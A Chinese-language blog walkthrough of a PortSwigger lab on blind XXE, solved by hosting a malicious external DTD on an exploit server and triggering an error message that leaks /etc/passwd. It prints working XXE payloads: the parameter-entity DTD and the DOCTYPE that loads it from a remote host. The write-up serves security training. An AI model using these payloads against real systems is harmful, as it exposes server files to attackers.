某不知名博客 某不知名博客
首页
  • 《vulcat文档》
  • Web安全

    • 《BurpSuite及官方实验室》
    • 《OSWE学习历程》
  • 云原生安全

    • 《Docker命令大全》
    • 《CKS考试学习指南》
    • 《旧-Kubernetes教程》
漏洞库
  • 《渗透工具大全》
  • 《云安全》
事件库
关于
  • 分类
  • 标签
  • 归档
GitHub (opens new window)

Carsaid

安全界的小学生
首页
  • 《vulcat文档》
  • Web安全

    • 《BurpSuite及官方实验室》
    • 《OSWE学习历程》
  • 云原生安全

    • 《Docker命令大全》
    • 《CKS考试学习指南》
    • 《旧-Kubernetes教程》
漏洞库
  • 《渗透工具大全》
  • 《云安全》
事件库
关于
  • 分类
  • 标签
  • 归档
GitHub (opens new window)
  • 前言

  • 服务器端主题(翻译)

  • 客户端主题(翻译)

  • 高级主题(翻译)

  • 扩展阅读(翻译)

  • 个人学习笔记

  • 实验室做题记录

    • 实验室做题记录
    • 服务器端

      • SQL注入

      • 身份验证

      • 目录遍历

      • OS命令注入

      • 业务逻辑漏洞

      • 信息泄露

      • 访问控制

      • 文件上传漏洞

      • SSRF漏洞

      • XXE注入漏洞

        • 学徒-普通XXE-文件检索
        • 学徒-普通XXE-执行SSRF攻击
        • 从业者-盲XXE-带外交互
        • 从业者-盲XXE-XML参数实体
        • 从业者-盲XXE-外部DTD
        • 从业者-盲XXE-错误消息
          • 题目
          • 实操
        • 专家-盲XXE-本地DTD复用
        • 从业者-隐藏攻击面-XInclude攻击
        • 从业者-隐藏攻击面-文件上传中的XXE
    • 客户端

    • 高级主题

  • BurpSuite及官方实验室
  • 实验室做题记录
  • 服务器端
  • XXE注入漏洞
clincat
2023-07-18
目录

从业者-盲XXE-错误消息

# 实验室:通过错误消息 实现盲XXE数据检索

# 题目

此实验室具有一个 “Check stock(库存检查)” 功能,它可以解析 XML 输入,但不会显示结果。

若要解决实验室问题,请使用外部 DTD 触发错误消息,显示/etc/passwd文件的内容。

本实验包含一个链接,指向另一个域中的漏洞利用服务器,你可以在该域中托管恶意 DTD 。

实验室-从业者

通过错误消息 实现盲XXE数据检索 >>

- name: 实验室-从业者
  desc: 通过错误消息 实现盲XXE数据检索 >>
  avatar: https://fastly.statically.io/gh/clincat/blog-imgs@main/vuepress/static/imgs/docs/burpsuite-learn/public/lab-logo.png
  link: https://portswigger.net/web-security/xxe/blind/lab-xxe-with-data-retrieval-via-error-messages
  bgColor: '#001350'
  textColor: '#4cc1ff'
1
2
3
4
5
6

# 实操

点击 “ACCESS THE LAB” 进入实验室。

Not Found Image

来到首页,点击任意商品下方的 “View details” 进入详情页。

Not Found Image

在商品详情页的下方,可以看到一个库存检查功能。

启用浏览器代理,然后点击 “Check stock” 检查库存。

Not Found Image

将请求数据包转发至 Repeater 功能模块。

尝试注入经典的 XML 外部实体,实体被禁止使用。

Not Found Image

回到实验室页面,点击上方的 “Go to exploit server” 进入漏洞利用服务器。

Not Found Image

服务器提供了一个托管功能,可以定义自己的 HTTP 响应信息。

Not Found Image

重新定义响应内容,以 “参数实体” 的形式构造 XXE 攻击载荷。

该载荷会读取/etc/passwd的文件内容,然后将其附加到路径/aaabbbccc/内容当中,最后访问该路径。然而在文件系统上,该路径并不存在,所以将会触发一个错误。

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///aaabbbccc/%file;'>">
%eval;
%error;
1
2
3
4

定义好之后,点击 “Store” 保存。

Not Found Image

访问服务器提供的 URL 链接,确认返回的内容无误。

Not Found Image

回到 BurpSuite ,注入 XML 参数实体,并加载远程 DTD 文件。

<!DOCTYPE xyz [ <!ENTITY % said SYSTEM "https://漏洞利用服务器的域/exploit"> %said; ]>
1

成功触发路径错误 “文件没有找到” ,错误信息中包含了/etc/passwd文件的内容。

Not Found Image

回到浏览器页面,实验已完成。

Not Found Image
编辑 (opens new window)
从业者-盲XXE-外部DTD
专家-盲XXE-本地DTD复用

← 从业者-盲XXE-外部DTD 专家-盲XXE-本地DTD复用→

最近更新
01
API测试笔记
04-30
02
msfvenom
03-29
03
Metasploit
03-29
更多文章>
Theme by Vdoing | Copyright © 2023-2024 Carsaid | MIT License
  • 跟随系统
  • 浅色模式
  • 深色模式
  • 阅读模式